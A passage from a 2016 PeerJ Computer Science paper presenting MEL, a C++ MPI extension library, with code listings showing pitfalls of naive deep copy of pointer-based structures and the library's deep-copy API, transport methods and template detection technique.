(2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 6/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 3 }; 4 5 //---------------------------------------------------// 6 // On sending process 7 SomeStruct myVar; 8 9 // Allocate sub array 10 myVar.len = 10; 11 MPI_Alloc_mem(myVar.len * sizeof(int), MPI_INFO_NULL, &(myVar. ptr)); 12 13 // Populate sub array with values... 14 15 // Send the footprint of the struct, allowing the receiver to check 16 //if ptr == nullptr or len == 0 17 MPI_Send(&myVar, sizeof(SomeStruct), MPI_BYTE, dst_rank, tag, comm); 18 19 // Resolve the dependency of the struct 20 if (myVar.ptr != nullptr && myVar.len > 0) { 21 MPI_Send(myVar.ptr, myVar.len, MPI_INT, dst_rank, tag, comm); 22 } 23 24 //---------------------------------------------------// 25 // On receiving process 26 SomeStruct myVar; 27 28 // Receive the footprint of the struct so we can check if the array 29 // needs receiving 30 MPI_Recv(&myVar, sizeof(SomeStruct), MPI_BYTE, src_rank, tag, comm); 31 32 // Resolve the dependency of the struct 33 if (myVar.ptr != nullptr && myVar.len > 0) { 34 MPI_Alloc_mem(myVar.len * sizeof(int), MPI_INFO_NULL, &(myVar. ptr)); 35 36 MPI_Recv(myVar.ptr, myVar.len, MPI_INT, src_rank, tag, comm); 37 } If an object which implements its own memory management through copy/move constructors and assignment operators, such as std::vector, is used, heap corruption can occur in a manner that can be difficult to debug. An example of this is shown in Listing 3. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 7/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ If a std::vector is copied by footprint its internal pointer, just like the raw pointer previously, is no longer valid. The vector class works on the assumption that its internal pointer is always valid, and that it needs to be de-allocated or re-allocated if any of the assignment, resize, or destructor functions are called. If the vector goes out of scope and its destructor is called the incurring segfault will often not be caught correctly by a debugger and the error will be reported “nearby,” leaving the programmer to hunt down the true source of the error. Short of using the C++ placement-new operator to force the vector to be recreated without calling its destructor there is no way of “safely” recovering in this situation. Listing 3 User example–the dangers of copying deep types by their footprint in memory without fixing them properly on the receiving processes. 1 struct SomeStruct { 2 std::vector<int> someVec; 3 }; 4 5 //---------------------------------------------------// 6 // On sending process 7 SomeStruct myVar; 8 9 // push_back into myVar.someVec a few times... 10 11 MPI_Send(&myVar, sizeof(SomeStruct), MPI_BYTE, dst_rank, tag, comm); 12 13 // Resolve the dependency of the struct 14 if (myVar.someVec.size() > 0) { 15 MPI_Send(&(myVar.someVec[0]), myVar.someVec.size(), MPI_INT, dst_rank, tag, comm); 16 } 17 18 //---------------------------------------------------// 19 // On receiving process 20 SomeStruct myVar; 21 MPI_Recv(&myVar, sizeof(SomeStruct), MPI_BYTE, src_rank, tag, comm); 22 23 // If myVar goes out of scope we segfault! 24 //myVar.someVec.clear(); // Segfault! 25 //myVar.someVec.resize(10); // Segfault! 26 //myVar.someVec.reserve(10); // Segfault! 27 //myVar.someVec = std::vector<int>();// Segfault! Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 8/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 28 // etc... 29 30 // It is safe to access .size() of the vector even if its internal 31 // pointer is invalid, we can use this to create a new vector in 32 // place, and to determine if we need to receive data. 33 34 // Force a new vector to be constructed at the memory address of the 35 // existing one without calling the existing vector's destructor. 36 new (&(myVar.someVec)) std::vector<int>(myVar.someVec.size()); 37 38 // Resolve the dependency of the struct 39 if (myVar.someVec.size() > 0) { 40 MPI_Recv(&(myVar.someVec[0]), myVar.someVec.size(), MPI_INT, src_rank, tag, comm); 41 } Buffered vs. non-buffered So far we have discussed methods for deep copying object types by recursively traversing the data-structure and performing discrete message operations to resolve each dependency. While often small there is a performance cost associated with beginning and ending a communication between processes, and this cost is exacerbated when communication occurs between processes on different physical nodes connected by a network interface. In many cases it is beneficial to pack a deep structure into a contiguous buffer on the sending process and to transport it as a single communication, the buffer can then be received and unpacked to reconstruct the target data structure. Listing 4 demonstrates a variant on Listing 2 where data is packed into a buffer before being transported and unpacked on the receiving process. While buffered deep copy enables greater performance when communicating large structures made up of many small objects between processes, this speed comes at the cost of increased code complexity and limitations on the size of data that can be transferred. In the scenario where the data to be deep copied occupies more than half of the available system memory buffering into a contiguous buffer is no longer applicable as there is no remaining space in memory to allocate the buffer. Additionally, for programs that make many small allocations and de-allocations during normal execution system memory can become fragmented, leading to a situation where there is more than enough available memory to allocate the buffer but it is split up in many small pieces meaning no one contiguous allocation can be made. In these scenarios there is no alternative but to perform a non-buffered deep copy to move the data. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 9/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Listing 4 User example–hand coded buffered deep copy using a dangling pointer from the sending process to determine if data needs to be unpacked. 1 struct SomeStruct { 2 int *ptr = nullptr, len = 0; 3 }; 4 5 //---------------------------------------------------// 6 // On sending process 7 SomeStruct myVar; 8 9 // Allocate sub array 10 myVar.len = 10; 11 MPI_Alloc_mem(myVar.len * sizeof(int), MPI_INFO_NULL, &(myVar. ptr)); 12 13 // Calculate buffer size and allocate space 14 int buffer_size = sizeof(SomeStruct); 15 if (myVar.ptr != nullptr && myVar.len > 0) { 16 buffer_size += (sizeof(int) * myVar.len); 17 } 18 19 char *buffer, *pos; 20 MPI_Alloc_mem(buffer_size, MPI_INFO_NULL, &buffer); 21 pos = buffer; 22 23 // Pack the struct itself to move non-deep members 24 memcpy(pos, &myVar, sizeof(SomeStruct)); 25 pos += sizeof(SomeStruct); 26 27 // Pack the array of the struct 28 if (myVar.ptr != nullptr && myVar.len > 0) { 29 memcpy(pos, myVar.ptr, sizeof(int) * myVar.len); 30 pos += sizeof(int) * myVar.len; 31 } 32 33 // Send the buffer 34 MPI_Send(buffer, buffer_size, MPI_BYTE, dst_rank, tag, comm); 35 36 // Free the buffer 37 MPI_Free_mem(buffer); 38 39 //---------------------------------------------------// Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 10/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 40 // On receiving process 41 SomeStruct myVar; 42 43 // Calculate buffer size and allocate space 44 MPI_Status status; 45 MPI_Probe(src_rank, tag, comm, &status); 46 47 int buffer_size; 48 MPI_Get_count(&status, MPI_BYTE, &buffer_size); 49 50 char *buffer, *pos; 51 MPI_Alloc_mem(buffer_size, MPI_INFO_NULL, &buffer); 52 pos = buffer; 53 54 // Receive the buffer 55 MPI_Recv(buffer, buffer_size, MPI_BYTE, src_rank, tag, comm); 56 57 58 // Unpack the struct itself to move non-deep members 59 memcpy(&myVar, pos, sizeof(SomeStruct)); 60 pos += sizeof(SomeStruct); 61 62 // Unpack the array of the struct 63 if (myVar.ptr != nullptr && myVar.len > 0) { 64 MPI_Alloc_mem(myVar.len * sizeof(int), MPI_INFO_NULL, &(myVar. ptr)); 65 66 memcpy(myVar.ptr, pos, sizeof(int) * myVar.len); 67 pos += sizeof(int) * myVar.len; 68 } 69 70 // Free the buffer 71 MPI_Free_mem(buffer); Buffering may also perform worse than non-buffered methods when the data to be deep copied consists of a small number of large objects, such as a struct containing several pointers to large buffers. In this case it may be detrimental to force the local copying of the large buffers into a single message only to unpack them on the receiving process when it would have been faster to transport them separately while taking the hit on the overheads associated with setting up multiple communications. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 11/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ MEL–THE MPI EXTENSION LIBRARY MEL is a C++11, header-only library, being developed with the goal of creating a lightweight and robust framework for building parallel applications on top of MPI. MEL is designed to introduce no (or minimal) overheads while drastically reducing code complexity. It allows for a greater range of common MPI errors to be caught at compile- time rather than during program execution when it can be far more difficult to debug. A good example of this is type safety in the MPI standard. The standard does not dictate how many of the object types should be implemented leaving these details to the implementation vendor. For instance, in Intel MPI 5.1 MPI_Comm objects and many other types are implemented as integer handles, typedef int MPI_Comm, to opaque data that are managed by the MPI run-time. A drawback with this approach is it causes compile time type-checking of function parameters to not flag erroneous combinations of variables. The common signature MPI_Send(void*, int, MPI_Datatype, int, int, MPI_Comm) is actually seen by the compiler as MPI_Send(void*, int, int, int, int, int), allowing any ordering of the last five variables to be compiled as valid MPI code, while potentially causing catastrophic failure at run-time. In contrast, Open MPI 1.10.2 implements these types as structs which are inherently type-safe. With MEL we aim to: � Remain true to the underlying design of MPI, by keeping to an imperative function interface that does not fundamentally change the way in which the programmer interacts with the MPI run-time. � To provide a type-safe, consistent, and unified function syntax that allows distributions of MPI from all vendors to behave in a common and predictable way at both compile- time and run-time. � To be soluble, allowing the compiler to remove the abstractions MEL provides to achieve the same performance as native MPI code. � To be memory efficient by minimizing the use of intermediate buffers whenever possible. � To make use of modern C++ language features and advanced template meta programming to both ensure correctness at compile-time and to generate boiler-plate values that programmers have to provide themselves with native MPI code. � To give higher-level functionality that is not available from the MPI standard such as deep copy Semantics (our focus in this paper). MEL deep copy Our algorithm is implemented in four parts, a top-level interface of functions for initiating deep copy as send/receive, broadcast, or file-IO operation; a transport API of functions that describe how data is to be moved within a deep copy operation, a set of transport methods that describe generically how to move a region of memory; and a hash-map interface for tracking which parts of the data structure have already been traversed. Figure 2 shows the architecture of our algorithm. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 12/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ In order to ensure correct memory management for deep structures the user must adhere to: � Unallocated pointers are initialized to nullptr. � Dynamic Memory must be allocated using MPI_Alloc_mem and freed using MPI_Free_mem, or the equivalent MEL calls: 1 T* MEL::MemAlloc<T>(int len) 2 T* MEL::MemAlloc(int len, T &value) 3 void MEL::MemFree(T *ptr) 4 T* MEL::MemConstruct<T>(Args &&...args) 5 void MEL::MemDestruct(T *ptr, int len = 1) � Pointers refer to distinct allocations. E.g. It is erroneous to have an allocation of the form char *ptr = new char[100] in one object, and to then have a weak-pointer into the array in subsequent objects: char *mySubPtr = &ptr[50]. In these situations, it is best to store integer offsets into the array, rather than the pointer address itself. Top-Level interface The top-level interface for our algorithm (Listing 5) consists of functions for initiating a deep copy as a send, receive, broadcast, or file access operation on a templated pointer (T*), a pointer-length pair (T*, len), an object reference (T&), or an STL container (std::vector<T>&, std::list<T>&). In the case of receiving methods (Recv, Bcast, and FileRead) the len parameter can either be passed by reference so that it can be modified to reflect the number of elements that were actually received, or captured from an integer literal or constant variable to provide a run-time assertion whether the correct number of elements were received. All methods are blocking and do not return until the entire data-structure has been transferred. Buffered variants of the top-level interface initiate a local deep copy to a contiguous buffer on the sender, this buffer is then sent as a single transport to the receiving processes where it can be unpacked. By decreasing the number of MPI communications or file Figure 2 MEL deep copy architecture. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 13/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ accesses needed to transfer a deep structure significant reductions in latency can be achieved, at the cost of added memory overhead from packing and unpacking data before and after transport. In general, large structures of small objects (i.e. a tree with many nodes that are small in memory) benefit most from buffering while smaller structures of large objects (i.e. a struct containing large arrays) tend to benefit from non-buffered transport. Another motivating reason for providing a non-buffered mechanism for deep copy is the scenario where the deep structure occupies more than half of the available system memory. In such cases it is not possible to make a single contiguous allocation large enough to pack the structured data. An example of where this can happen is the use of MPI to distribute work to banks of Intel Xeon Phi Coprocessors which are exposed to the host system via a virtual network interface. While such hardware provides a large number of physical processor cores (60) on card memory is reduced (8–16 GB). On larger systems with more available memory this is less likely to occur although the use of non-buffered methods may still be desirable for the reasons outlined above; and in any case, achieving low memory overhead is good practice. Detecting objects that require deep copy Determining whether a given object is “deep” or not is performed at compile time using C++ template meta-programming to detect the presence of a member function of the form template<typename MSG> void DeepCopy(MSG &msg) that describes how to resolve the dependencies of a given object type. The template parameter MSG is a shorthand for MEL::Deep::Message<TRANSPORT_METHOD, HASH_MAP> where TRANSPORT_METHOD and HASH_MAP are types satisfying the constraints described in sections Transport Method and Hashing Shared Pointers, respectively. A detailed example of the method used to detect the presence of a matching member function is given in section Detecting the Deep Copy Function using Template Meta-Programming. The use of template meta-programming in C++ allows for the complete set of possible copy operations needed to transport a structure to be known at compile time, allowing the compiler to make optimizations that might otherwise not be possible if inheritance and virtual function calls were used. Template programming also opens up the future possibility of using more advanced C++ type_traits such as std::is_pod<T> (is-plain-old-data) and other similar type traits to help make informed decisions about how best to move types automatically at compile time. Listing 5 MEL implementation–MEL deep copy top-level interface. 1 // Calculate buffer size needed to pack an object or array of objects. 2 int MEL::Deep::BufferSize(T &obj) 3 int MEL::Deep::BufferSize(T *&ptr) 4 int MEL::Deep::BufferSize(T *&ptr, const int len) 5 int MEL::Deep::BufferSize(STL &container) 6 // ^ STL can (currently) be std::vector, std::list Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 14/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 7 8 // MPI_Send 9 void MEL::Deep::Send(T &obj, const int dst, const int tag, const MEL::Comm &comm) 10 void MEL::Deep::Send(T *&ptr, ...) 11 void MEL::Deep::Send(T *&ptr, const int len, ...) 12 void MEL::Deep::Send(STL &container, ...) 13 14 // MPI_Recv 15 void MEL::Deep::Recv(T &obj, const int src, const int tag, const MEL::Comm &comm) 16 void MEL::Deep::Recv(T *&ptr, ...) 17 void MEL::Deep::Recv(T *&ptr, int const &len, ...) 18 // ^ len matches int literals and constants - runtime assertion 19 // on number of received elements 20 void MEL::Deep::Recv(T *&ptr, int &len, ...) 21 // ^ len matches int variables by reference - gets set to the 22 // number of received elements 23 void MEL::Deep::Recv(STL &container, ...) 24 25 // MPI_Broadcast 26 void MEL::Deep::Bcast(T &obj, const int root, const MEL::Comm &comm) 27 void MEL::Deep::Bcast(T *&ptr, ...) 28 void MEL::Deep::Bcast(T *&ptr, int const &len, ...) 29 // ^ len matches int literals and constants - runtime assertion on 30 // number of received elements 31 void MEL::Deep::Bcast(T *&ptr, int &len, ...) 32 // ^ len matches int by reference - set on receivers to the number 33 // of received elements 34 void MEL::Deep::Bcast(STL &container, ...) 35 36 // STL File Streams 37 void MEL::Deep::FileWrite(T &obj, std::ofstream &file) 38 void MEL::Deep::FileRead(T &obj, std::ifstream &file) 39 40 // MPI_File 41 void MEL::Deep::FileWrite(T &obj, MEL::File &file) 42 void MEL::Deep::FileRead(T &obj, MEL::File &file) 43 44 // Overloads for buffered methods follow the same pattern 45 void MEL::Deep::BufferedSend(T &obj, ...) 46 void MEL::Deep::BufferedSend(T &obj, ..., const int bufferSize) Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 15/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 47 // ^ Source process can specify the buffer size to allocate for 48 // packing the structure 49 50 void MEL::Deep::BufferedRecv(T &obj, ...) 51 // ^ Buffer size on the recieving processes is determined from the 52 // sender 53 54 void MEL::Deep::BufferedBcast(T &obj, ...) 55 void MEL::Deep::BufferedBcast(T &obj, ..., const int bufferSize) 56 // ^ Buffer size only used on sender, ignored on receiving 57 // processes 58 59 void MEL::Deep::BufferedFileWrite(T &obj, ...) 60 void MEL::Deep::BufferedFileWrite(T &obj, ..., const int bufferSize) 61 62 void MEL::Deep::BufferedFileRead(T &obj, ...) Because we use the same function for sending/receiving, buffered/non-buffered, and for point-to-point/collective/ or file access communications we make use of a utility type, Message, that tracks which operation is being performed and where data is coming from or going to. The message object is created internally when one of the top-level functions is called and remains unmodified throughout the deep copy. Message Transport-API The deep copy function declares to our algorithm how data dependencies of a type need to be resolved in order to correctly rebuild a data structure on the receiving process. To keep the definition of this function simple the Message object exposes a small API of functions (Listing 6) that abstract the details of how data is sent and received between processes. Listing 6 MEL implementation–message transport-API. 1 // Transfer a deep object. Only needed for deep types! 2 // Non-deep members are transported automatically 3 void Message::packVar(T &obj) 4 5 // Transfer a deep/non-deep pointer to len objects 6 void Message::packPtr(T *&ptr, int len = 1) 7 8 // Transfer a deep/non-deep pointer to len objects where the 9 // pointer may also be referenced in Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 16/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 10 // other parts of the deep structure. (i.e. A graph structure 11 // where multiple nodes point to a shared neighbour) 12 void Message::packSharedPtr(T *&ptr, int len = 1) 13 14 // Transfer a std::vector of deep/non-deep objects. 15 void Message::packSTL(std::vector<T> &vec) 16 // Or a std::list (doubly linked list). 17 void Message::packSTL(std::list<T> &lst) 18 19 // Or use the shorthand operators 20 Message& Message::operator&(T &obj) // <- Calls packVar which is 21 // only defined for deep types 22 Message& Message::operator&(std::vector<T> &vec) 23 Message& Message::operator&(std::list<T> &lst) 24 25 // Only used in Top Level interface functions, these variants differ 26 // only from their standard counterparts (above) in that they do not 27 // assume the parent object has been transported as for the root 28 // object there is no parent. 29 void Message::packRootVar(T &obj) 30 void Message::packRootPtr(T *&ptr, int len = 1) 31 void Message::packRootSTL(std::vector<T> &vec) 32 void Message::packRootSTL(std::list<T> &lst) Listing 7 gives an example usage of the Message transport API to move a complex data-structure. All of the functions provided work transparently with both deep and non- deep types, with the exception of Message::packVar which is intended only for the transport of deep types as non-deep member variables will be transported automatically. By comparison, Boost Serialization Library requires that all types except for language defined base types (i.e. int, bool, double) provide serialization functions regardless of whether they contain deep members, and that all member variables within the type (including non-deep members) are explicitly registered with the archive object. Listing 7 MEL implementation–registering dependencies using the transport-API. 1 struct SomeDeepStruct { 2 // Non-deep members will be copied automatically. 3 int a, b, c, len; 4 SomeFlatStruct d; 5 6 // Deep members must be declared in the Deep-copy function 7 AnotherDeepStruct e, f, g; Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 17/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 8 char *myArray = nullptr; 9 GraphNode *mySharedPointer = nullptr; 10 std::vector<int> v; 11 std::vector<AnotherDeepStruct> w; 12 13 template<typename MSG> 14 void DeepCopy(MSG &msg) { 15 // Pack a deep object by reference. 16 msg.packVar(e); 17 // A lighter syntax for non-pointer members. 18 msg & f & g; 19 20 // Transfer a char array of len elements. 21 msg.packPtr(myArray, len); 22 // Transfer a shared pointer that may also be used 23 // elsewhere in the structure. 24 msg.packSharedPtr(mySharedPointer); 25 26 // Transfer a std::vector. 27 msg.packSTL(v); 28 // We can also transfer a std::vector or std::list 29 // using & syntax. 30 msg & w; 31 32 // In fact, we can simply replace all of the above 33 // code (in this function) with: 34 msg & e & f & g & v & w; 35 msg.packPtr(myArray, len); 36 msg.packSharedPtr(mySharedPointer); 37 } 38 }; An example copy In essence, the deep copy algorithm works by both sending and receiving processes entering a message loop or handshake with one another where they both expect to keep sending and receiving data until the entire structure has been transferred. The sending process determines how much data is to be sent, and this information is conveyed to the receiving processes transparently in such a way that when a receiving process determines there is nothing left to receive the sending process has returned. Listing 8 shows an example of using the deep copy function to move an array of non- deep objects. Because the type, int, does not provide a member function for deep copy Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 18/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ the footprint of the array is sent in a single MPI message. On the receiving process memory is allocated into the pointer provided and the data is received. Listing 8 User example–MEL deep copy of non-deep type. 1 // On sending process 2 int len = 10; 3 int *ptr = MEL::MemAlloc<int>(len); 4 5 // Fill ptr with some values... ptr = [0..len) 6 for (int i = 0; i < len; ++i) ptr[i] = i; 7 8 MEL::Deep::Send(ptr, len, dst_rank, tag, comm); 9 10 //---------------------------------------------------// 11 // On receiving process 12 int len; 13 int *ptr = nullptr; 14 MEL::Deep::Recv(ptr, len, src_rank, tag, comm); 15 // len = 10 and ptr now equals an address to len integers 16 // ptr = [0..len) An example of moving an array of structs containing pointers to dynamically allocated memory is given in Listing 9. In order to correctly reconstruct the data on receiving processes a deep copy function has been implemented which tells the algorithm to copy a char array containing len elements. Because the type has a deep copy function the receiving processes will allocate the memory for the array of structs and copy the footprint of the array as a single contiguous chunk resulting in non-deep member variables being transferred automatically. The receiving process makes the necessary allocations to receive its dependencies. Both sending and receiving processes will then loop over each element in their array and call the objects deep copy function to resolve its data dependencies. If the struct contained variables which themselves required a deep copy the algorithm would recurse on them until all dependencies are resolved. In this simple case, however, the struct contains a char array which does not require a deep copy and as such the sub-array is transferred by allocating the needed memory and copying the entire sub-array as one contiguous chunk, as in Listing 8. Listing 9 User example–MEL deep copy of deep type. 1 struct SomeStruct { 2 int len; 3 char *array = nullptr; 4 Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 19/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 5 template<typename MSG> void DeepCopy(MSG &msg) { 6 msg.packPtr(array, len); 7 } 8 }; 9 10 //---------------------------------------------------// 11 // On sending process allocate array and subarrays 12 int len = 5; 13 SomeStruct *ptr = MEL::MemAlloc<SomeStruct>(len); 14 15 for (int i = 0; i < len; ++i) { 16 // Allocate sub array 17 ptr[i].len = i + 1; 18 ptr[i].array = MEL::MemAlloc<char>(ptr[i].len); 19 20 // Fill ptr[i].ptr with some values... ptr_i = [0..len) 21 for (int j = 0; j < ptr[i].len; ++j) ptr[i].array[j] = j; 22 } 23 24 MEL::Deep::Send(ptr, len, dst_rank, tag, comm); 25 26 //---------------------------------------------------// 27 // On receiving process 28 int len; 29 SomeStruct *ptr = nullptr; 30 MEL::Deep::Recv(ptr, len, src_rank, tag, comm); 31 // len = 5 and ptr equals an address to an array of 5 structures 32 // each having their respective lengths and subarrays 33 // ptr = [0..5) : { [0..1), [0..2), [0..3), [0..4), [0..5) } Transport method The Message object represents how our algorithm traverses the deep structure and ensures that both sending and receiving processes independently come to the same conclusion on what order objects are traversed in with minimal communication. This traversal order is independent of, and identical for all deep copy operations. Because of this we template the Message object on a type that represents the specific nature of the data transportation we want to perform (i.e. Message<TransportSend> to perform deep copy as an MPI_Send communication), allowing the same traversal scheme to be reused. As a part of our implementation we provide transport methods for a wide variety of data movement scenarios: Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 20/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ TransportSend Performs each transport call as a discrete MPI_Send communication. TransportRecv Performs each transport call as a discrete MPI_Recv communication. TransportBcastRoot Performs each transport call as a discrete MPI_Bcast com- munication, as a sender. TransportBcast Performs each transport call as a discrete MPI_Bcast com- munication, as a receiver. TransportFileWrite Performs each transport call as a discrete MPI_FileWrite operation. TransportFileRead Performs each transport call as a discrete MPI_FileRead operation. TransportSTLFileWrite Performs each transport call as a discrete std::ofstream:: write. TransportSTLFileRead Performs each transport call as a discrete std::ifstream:: read. TransportBufferWrite Performs each transport call as a discrete std::memcpy to a contiguous memory buffer. TransportBufferRead Performs each transport call as a discrete std::memcpy from a contiguous memory buffer. NoTransport This transport method acts as a sender but does not move any data. This method is used to implement the top-level interface functions for MEL::Deep::BufferSize which counts how many bytes need to be moved without performing any transportation. Adding additional transport methods is as simple as implementing a class with a public-member function of the form template<typename T> inline void transport(T *&ptr, const int len) that describes how to move a region of memory, and a public-static-member variable static constexpr bool SOURCE which tells the compiler whether or not this is a sending or a receiving transport method. This boolean is important as it tells the Message object whether or not it needs to make allocations as it traverses the deep structure. The transport method should also store any state variables need to maintain the transport over the duration of the deep copy. Such state variables may be but are not limited to an MPI communicator and process rank, a file handle, or a pointer to an array used for buffering. Hashing shared pointers When considering large structured data containing duplicate pointers the method used to track which parts of the structure have already been transported can have a significant impact on the traversal time. A hash-map is a natural choice for representing an unordered map between two pointers as it is efficient for random access lookups and insertions. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 21/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ As with the transport method, the Message object is also templated on the hash-map to use for pointer tracking, namely Message<TRANSPORT_METHOD, HASH_MAP = MEL:: Deep::PointerHashMap>. This allows for the user to provide an adapter to their own implementation of a hash-map specifically optimized for pointers or to provide an adapter type to a third-party hash-map implementation. To use a custom hash-map with any of the top-level functions simply override the default template parameter when initiating a deep copy operation. E.g. MEL::Deep:: Send<int, MyCustomHashMap>(ptr, len, dst, tag, comm); where MyCustomHashMap exposes public-member functions of the form: template<typename T> inline bool find(T* oldPtr, T* &ptr) template<typename T> inline void insert(T* oldPtr, T* ptr) These functions are templated on the pointer type, T*, so that user provided hash-map adapters are able to use this extra type information to optimize hashing if needed. External deep copy functions So far we have discussed the use of deep copy functions and the transport API in cases where the deep copy function was a local member function of the type being considered. In some use cases, a structure may be defined in headers or libraries that cannot be modified easily (or at all). In such cases, we still would like to be able to define the deep copy semantics for the type without directly modifying its implementation. To enable this, we provide an overload of all the functions in the transport API and top-level interface that take an additional template parameter that is a handle to a global-free- function of the form template<typename MSG> inline void MyTypeDeepCopy(MyType &obj, MSG &msg) that takes by reference an instance of the object to transport and a Message object to perform the deep copy. Listing 10, shows the usage of external free deep copy functions with types needing deep copy. StructB contains an internal member function for performing deep copy, while StructA does not. Passing an instance of StructA to the top-level interface will result in incorrect results as its dependencies will not be resolved. By implementing a global-free- function that defines the deep copy requirements of StructA, we can then tell the top-level interface to explicitly use that function to resolve external dependencies of the type. If we provide an external free function for StructB which already has an internal deep copy function, the internal function is ignored and the free function explicitly given is used. Listing 10 User example–using external global-free-functions for deep copy. 1 struct StructA { 2 std::vector<int> arr; 3 }; 4 Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 22/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 5 struct StructB { 6 std::list<int> lst; 7 8 // Internal - Local member deep-copy function 9 template<typename MSG> void DeepCopy(MSG &msg) { 10 msg & lst; 11 } 12 }; 13 14 // External - Global free deep-copy function 15 template<typename MSG> void StructA_DeepCopy(StructA &obj, MSG &msg) { 16 msg & obj.arr; 17 } 18 19 // External - Global free deep-copy function 20 template<typename MSG> void StructB_DeepCopy(StructB &obj, MSG &msg) { 21 msg & obj.lst; 22 } 23 24 // Example usage: 25 StructA sA; 26 27 MEL::Deep::Send(sA, dst, tag, comm); 28 // ^ Error! StructA contains a std::vector but does not 29 // have a deep-copy function 30 31 MEL::Deep::Send<StructA, MEL::Deep::PointerHashMap, StructA_DeepCopy>(sA, dst, tag, comm); 32 // ^ Correct. Uses external free function to perform the deep-copy 33 34 35 StructB sB; 36 37 MEL::Deep::Send(sB, dst, tag, comm); 38 // ^ Correct. Uses internal member function to perform the deep-copy 39 40 MEL::Deep::Send<StructB, MEL::Deep::PointerHashMap, StructB_DeepCopy>(sB, dst, tag, comm); 41 // ^ Correct. Uses external free function (overrides 42 // internal function) to perform the deep-copy Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 23/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ The same rules apply for providing external free functions to the transport API. Listing 11, shows an example of this, where once again StructA is a deep type that does not provide an internal deep copy function. StructC is also deep and contains a std::list of StructA. If the deep copy function of StructC simply calls the ampersand operator or Message:: packSTL function (Listing 11, lines 15, 16) to transport the std::list then the instances of StructA will be transported incorrectly as a non-deep type. In the same manner as with the top-level interface the free function to use to deep copy StructA is given explicitly to Message::packSTL so that it can correctly resolve the dependencies of the deep structure. Listing 11 User example–using external global-free-functions for deep copy with the Transport-API. 1 struct StructA { 2 std::vector<int> arr; 3 }; 4 5 // External - Global free deep-copy function 6 template<typename MSG> void StructA_DeepCopy(StructA &obj, MSG &msg) { 7 msg & obj.arr; 8 } 9 10 struct StructC { 11 std::list<StructA> lst; 12 13 // Internal - Local member deep-copy function 14 template<typename MSG> void DeepCopy(MSG &msg) { 15 //msg & lst; // <- Error - StructA has no internal 16 // deep-copy function 17 //msg.packSTL(lst); // <- Error 18 msg.packSTL<StructA, StructA_DeepCopy>(lst); // <- Correct 19 } 20 }; 21 22 // Example usage: 23 StructC sC; 24 MEL::Deep::Send(sC, dst, tag, comm); 25 // ^ Correct. Uses internal member function of StructC and the 26 // external free function StructA_DeepCopy for StructA. The option to use external deep copy functions gives our method flexibility when we need to add deep copy semantics to code that cannot be directly, or easily modified. However, this does not mean it will always be applicable as it requires intimate and low- level knowledge of the object’s internal implementation and methods of allocation. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 24/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ MEL IMPLEMENTATION DETAILS In the following section we provide a detailed discussion of the implementation of the MEL deep copy algorithm. Detecting the deep copy function using template meta-programming To detect whether the type under consideration contains a deep copy function we make use of SFINAE (Substitution Failure Is Not An Error) to create a compile-time boolean test for the existence of a member function with the desired signature. We encapsulate the usage of this method into a templated shorthand that uses std::enable_if to give us a clean and concise method for providing function overloads for deep and non-deep types. Listing 12, shows an implementation of the technique used to conditionally detect member functions of template types at compile time. The overloads of void someFunc (T &obj) for when T is or is not a type with a deep copy function allows us specialize our implementation for deep types while allowing them to share identical function signatures. Listing 12 MEL implementation–detecting the deep copy function. 1 template<typename T> 2 struct HasDeepCopyMethod { 3 // This pseudo-type does not exist unless type U has a member 4 // function of the desired form: 5 // template<typename MSG> void DeepCopy(MSG &msg) 6 template<typename U, void(U::*)(MEL::Deep::Message <NoTransport>&)> struct SFINAE {}; 7 8 // If this succeeds Test<T> will be a function that returns char 9 template<typename U> static char Test(SFINAE<U, &U::DeepCopy>*); 10 // Otherwise Test<T> will return an int 11 template<typename U> static int Test(...); 12 13 // We can now test if type T has the desired member function by 14 // seeing if the result is the size of a char or an int. 